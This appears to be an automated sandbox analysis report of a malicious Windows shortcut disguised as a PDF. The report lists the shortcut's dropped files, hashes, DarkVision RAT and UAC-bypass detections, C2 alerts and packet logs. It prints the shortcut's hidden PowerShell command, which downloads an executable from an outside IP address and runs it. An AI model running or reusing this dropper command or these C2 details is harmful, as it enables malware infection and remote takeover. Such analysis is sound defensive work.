                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1x3qua1s.c4b.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vsj1jqc.olv.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h34litys.2lu.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkbhxor4.kvs.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jh5p32i0.wvc.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqimmqci.wir.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4zy15f0.p1x.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sr2ww4iv.0jw.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0jkkkdh.zvd.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\file.exe

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):4312064
                                                        Entropy (8bit):5.975451257646493
                                                        Encrypted:false
                                                        SSDEEP:49152:0WMGLpZbOwUvMB/gDck3KcbW4gtRt7P7KUV85:1xB/Mt3jW9BP7KUVc
                                                        MD5:A3A87410C13CC37B48A9D63D84798A26
                                                        SHA1:170685B36CE0C7CA791B80886E88F3955A707527
                                                        SHA-256:BBB59F158A76D0B043C7D050BBA4C4AD82B94D383F9DB265119A24360D7279E4
                                                        SHA-512:1E7071749D1E96674A6A802A6317E7F71350975516F0C75FE0D0F6D987AD5D6DB91FF6CBA43A8C03117DDAECCC2AC40E97F10F2CBA20204A645E9369FB38B543
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: Joe Security
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: ditekSHen
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 45%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ a.[A..[A..[A..47.._A..@..QA..R9..XA..R9..ZA..R9..RA..[A..%A..@...A..@..2A..@..ZA..@..ZA..Rich[A..........PE..d...M.6g.........."......|............A........@..............................B......%B...@................................................................. .A.@................................................................................................... . .p.......p..................@....rsrc...............................@....idata ............................@...gvpobjry.0:......&:.................@...raqptenq......A.......A.............@....pdata.I. ....A.......A.............@..@................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3e2aad753fc75f16.customDestinations-ms (copy)

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):5367
                                                        Entropy (8bit):3.461564528461544
                                                        Encrypted:false
                                                        SSDEEP:48:e41wR40nWkjWrgbT+0YlLh07SogZoa8a8Q7T+0YlGh07SogZoa8a8E1:e8wS0nLlT+0YL0+HNRRT+0YQ0+HNRn
                                                        MD5:D9CB2594D32FC3120C15FE94926BE72B
                                                        SHA1:85CF1B83777D48E194CDDDA2382CF2073CB1F532
                                                        SHA-256:D52A278FADF9EF094FD8C032F8B4D79F77A17D1E0181560EFC2293D2EDDF79AE
                                                        SHA-512:4F66F9A7C76822F73FD7283E2261E56023DF66D1D77E4F2A5DD0E0739AB86AA18F0666C97FC38CFE5A95300046C444CDA6E0C63451232DFB01117D94B440AA77
                                                        Malicious:false
                                                        Preview:...................................FL..................F.`.. ......!w...!=).fX....q.fX...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......i..5q.....s#w...!=).fX....r.2......Y.n .LPO-00~1.LNK..V......EW.S.Y.n....:..... ...................L.P.O.-.0.0.4.8.5.3.2.0.2.5...l.n.k.......W...............-.......V...........4].......C:\Users\user\Desktop\LPO-0048532025.lnk..).C.:.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.w.i.n.d.o.\.p.d.f.-.i.c.o.n...i.c.o.........%SystemDrive%\Users\admin\Desktop\windo\pdf-icon.ico................................................................................................................................................................................................................%.S.y.s.t.e.m.D.r.i.v.e.%.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.w.i.n.d.o.\.p.d.f.-.i.c.o.n...i.c.o......................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HHSN5PEJMI2RUEDVE1XU.temp

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):5367
                                                        Entropy (8bit):3.461564528461544
                                                        Encrypted:false
                                                        SSDEEP:48:e41wR40nWkjWrgbT+0YlLh07SogZoa8a8Q7T+0YlGh07SogZoa8a8E1:e8wS0nLlT+0YL0+HNRRT+0YQ0+HNRn
                                                        MD5:D9CB2594D32FC3120C15FE94926BE72B
                                                        SHA1:85CF1B83777D48E194CDDDA2382CF2073CB1F532
                                                        SHA-256:D52A278FADF9EF094FD8C032F8B4D79F77A17D1E0181560EFC2293D2EDDF79AE
                                                        SHA-512:4F66F9A7C76822F73FD7283E2261E56023DF66D1D77E4F2A5DD0E0739AB86AA18F0666C97FC38CFE5A95300046C444CDA6E0C63451232DFB01117D94B440AA77
                                                        Malicious:false
                                                        Preview:...................................FL..................F.`.. ......!w...!=).fX....q.fX...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......i..5q.....s#w...!=).fX....r.2......Y.n .LPO-00~1.LNK..V......EW.S.Y.n....:..... ...................L.P.O.-.0.0.4.8.5.3.2.0.2.5...l.n.k.......W...............-.......V...........4].......C:\Users\user\Desktop\LPO-0048532025.lnk..).C.:.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.w.i.n.d.o.\.p.d.f.-.i.c.o.n...i.c.o.........%SystemDrive%\Users\admin\Desktop\windo\pdf-icon.ico................................................................................................................................................................................................................%.S.y.s.t.e.m.D.r.i.v.e.%.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.w.i.n.d.o.\.p.d.f.-.i.c.o.n...i.c.o......................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{BE5C9BF3-0A41-4A6C-B6A8-511461B7BEF1}.lnk

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 27 12:53:51 2024, mtime=Fri Dec 27 12:53:51 2024, atime=Fri Dec 27 12:53:51 2024, length=105, window=hide
                                                        Category:dropped
                                                        Size (bytes):1087
                                                        Entropy (8bit):4.51519165709305
                                                        Encrypted:false
                                                        SSDEEP:24:8Ohfhplpa5xVf/tvOyAw0Xp7VT5TVf/tvilm:8OhhDkXVfww0Z7htVfI
                                                        MD5:D1AEF211D715172175510DF909761C64
                                                        SHA1:06A510DB7DC02FA28E6D673C1A0F5DE3818D5438
                                                        SHA-256:F0445A9B63281A89E4F7129A15DFE7442F58B3EB2451BD901399F8967A09ED47
                                                        SHA-512:911290212224DFE65E980C1C2F52DE3AFCDA78E6DBDF609540965163B61E9A2E9E6C1C4545EC267F16F40A0246107DA2C8AF08856CA8DCAB93546071C3A38350
                                                        Malicious:false
                                                        Preview:L..................F.... ...-..fX...-..fX...-..fX..i............................P.O. .:i.....+00.../C:\...................`.1......Y.n. PROGRA~3..H......O.I.Y.n....g......................I..P.r.o.g.r.a.m.D.a.t.a.......1......Y.n. {F507C~1..~......Y.n.Y.n..........................3.{.F.5.0.7.C.7.E.B.-.0.4.6.0.-.4.1.9.E.-.B.E.0.6.-.0.F.A.6.D.F.A.3.1.5.D.F.}.......2.i....Y.n {C0EDD~1.BAT.........Y.n.Y.n..........................3.{.C.0.E.D.D.5.5.B.-.2.6.1.0.-.4.B.C.4.-.A.0.6.C.-.A.0.1.4.D.B.0.7.F.0.3.4.}...b.a.t.......................-...................4].......C:\ProgramData\{F507C7EB-0460-419E-BE06-0FA6DFA315DF}\{C0EDD55B-2610-4BC4-A06C-A014DB07F034}.bat..x.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.{.F.5.0.7.C.7.E.B.-.0.4.6.0.-.4.1.9.E.-.B.E.0.6.-.0.F.A.6.D.F.A.3.1.5.D.F.}.\.{.C.0.E.D.D.5.5.B.-.2.6.1.0.-.4.B.C.4.-.A.0.6.C.-.A.0.1.4.D.B.0.7.F.0.3.4.}...b.a.t.`.......X.......721680...........hT..CrF.f4... .3!..jc...+...E...hT..CrF.f4... .3!

                                                        Static File Info

                                                        General

                                                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 22 09:59:47 2013, mtime=Thu Aug 22 09:59:47 2013, atime=Thu Aug 22 09:59:47 2013, length=479744, window=hide
                                                        Entropy (8bit):3.493619442626689
                                                        TrID:
                                                        • Windows Shortcut (20020/1) 100.00%
                                                        File name:LPO-0048532025.lnk
                                                        File size:2'290 bytes
                                                        MD5:4dab3e7b78ccfc190b36eb728b6e74d0
                                                        SHA1:296f5169adbc438e4ec1610d46c0f451417b7b71
                                                        SHA256:b11bfaa78d9b614cf39cc02d64fe8c115085ce39c9b747913705a6520e8a7e7d
                                                        SHA512:227e416b6f1f3e465d02da79c9683348d7e26c016fc7c9aa37b9e11189ecb351f0f9d992548182af6831b56e81f2301bd6169ba539aa203457b0823d27a11ee0
                                                        SSDEEP:24:8WKYmA8RCP+Ndohu2UJK8w/W0AfWkp+/CWHiAGfeuUMkWU5DvWkiOq6vWJ9kGabQ:8WKYR+UhJWDovuHwzWki0WzkGabd
                                                        TLSH:D841CB041AF55724DBF6A7BAACB663218A32FC0ADE508F8F0260C54A2C51214E824F3F
                                                        File Content Preview:L..................F.@.. ...>=..&...>=..&....)t.&....R...........................P.O. .:i.....+00.../C:\...................V.1......Y....Windows.@........C.l.Y......).........................W.i.n.d.o.w.s.....Z.1......Y|...System32..B........C.l.Y|.....9.

                                                        File Icon

                                                        Icon Hash:74f0e4e4e4e1e1ed

                                                        Static Windows Shortcut Info

                                                        General

                                                        Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Command Line Argument:-windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile %TEMP%\file.exe; Start-Process '%TEMP%\file.exe' }"
                                                        Icon location:C:\Users\admin\Desktop\windo\pdf-icon.ico

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-27T14:53:40.215931+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.104972187.120.113.9180TCP
                                                        2024-12-27T14:53:40.215976+01001810003Joe Security ANOMALY Windows PowerShell HTTP PE File Download287.120.113.9180192.168.2.1049721TCP
                                                        2024-12-27T14:53:56.060847+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104976287.121.86.2143441TCP
                                                        2024-12-27T14:53:58.295619+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.104976287.121.86.2143441TCP
                                                        2024-12-27T14:53:59.159333+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104976887.121.86.2143441TCP
                                                        2024-12-27T14:54:00.976299+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104977487.121.86.2143441TCP
                                                        2024-12-27T14:54:02.853813+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104977987.121.86.2143441TCP
                                                        2024-12-27T14:54:04.730431+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104978487.121.86.2143441TCP
                                                        2024-12-27T14:54:06.542515+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104978987.121.86.2143441TCP
                                                        2024-12-27T14:54:49.969424+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104988087.121.86.2143441TCP
                                                        2024-12-27T14:54:52.127117+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.104988087.121.86.2143441TCP
                                                        2024-12-27T14:54:52.973074+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104988887.121.86.2143441TCP
                                                        2024-12-27T14:54:54.846016+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104989387.121.86.2143441TCP
                                                        2024-12-27T14:54:57.074910+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104989887.121.86.2143441TCP
                                                        2024-12-27T14:54:58.886024+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104990387.121.86.2143441TCP
                                                        2024-12-27T14:55:00.652070+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104990987.121.86.2143441TCP
                                                        2024-12-27T14:55:35.769975+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104998687.121.86.2143441TCP
                                                        2024-12-27T14:55:38.253045+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.104998687.121.86.2143441TCP
                                                        2024-12-27T14:55:39.258495+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104999287.121.86.2143441TCP
                                                        2024-12-27T14:55:41.226888+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104999387.121.86.2143441TCP
                                                        2024-12-27T14:55:43.158775+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104999487.121.86.2143441TCP
                                                        2024-12-27T14:55:45.539195+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104999587.121.86.2143441TCP
                                                        2024-12-27T14:55:47.457956+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104999687.121.86.2143441TCP
                                                        2024-12-27T14:56:23.103361+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104999787.121.86.2143441TCP
                                                        2024-12-27T14:56:25.391295+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.104999787.121.86.2143441TCP
                                                        2024-12-27T14:56:26.261211+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104999887.121.86.2143441TCP
                                                        2024-12-27T14:56:28.071210+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.104999987.121.86.2143441TCP
                                                        2024-12-27T14:56:29.822188+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.105000087.121.86.2143441TCP
                                                        2024-12-27T14:56:31.830188+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.105000187.121.86.2143441TCP
                                                        2024-12-27T14:56:33.654581+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.105000287.121.86.2143441TCP
                                                        2024-12-27T14:57:08.976104+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.105000387.121.86.2143441TCP
                                                        2024-12-27T14:57:11.265358+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.105000387.121.86.2143441TCP
                                                        2024-12-27T14:57:12.131748+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.105000487.121.86.2143441TCP
                                                        2024-12-27T14:57:13.898040+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.105000587.121.86.2143441TCP
                                                        2024-12-27T14:57:15.663782+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.105000687.121.86.2143441TCP
                                                        2024-12-27T14:57:17.483886+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.105000787.121.86.2143441TCP
                                                        2024-12-27T14:57:19.321950+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.105000887.121.86.2143441TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 27, 2024 14:53:38.709206104 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:38.828901052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:38.829020977 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:38.833367109 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:38.953298092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.215800047 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.215828896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.215842009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.215930939 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.215976000 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.215991974 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.216032982 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.297801971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.297832966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.297844887 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.297934055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.297940016 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.297981024 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.335628986 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.335665941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.335762978 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.339751005 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.397043943 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.417262077 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.417292118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.417345047 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.421195030 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.421263933 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.421314001 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.427675962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.427777052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.427854061 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.436060905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.436157942 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.436204910 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.444464922 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.444557905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.444606066 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.498950958 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.499151945 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.499228954 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.503097057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.504641056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.504754066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.504806042 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.513106108 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.513161898 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.513209105 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.521446943 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.521509886 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.521526098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.529859066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.529946089 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.529977083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.538194895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.538240910 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.538295984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.546619892 CET804972187.120.113.91192.168.2.10
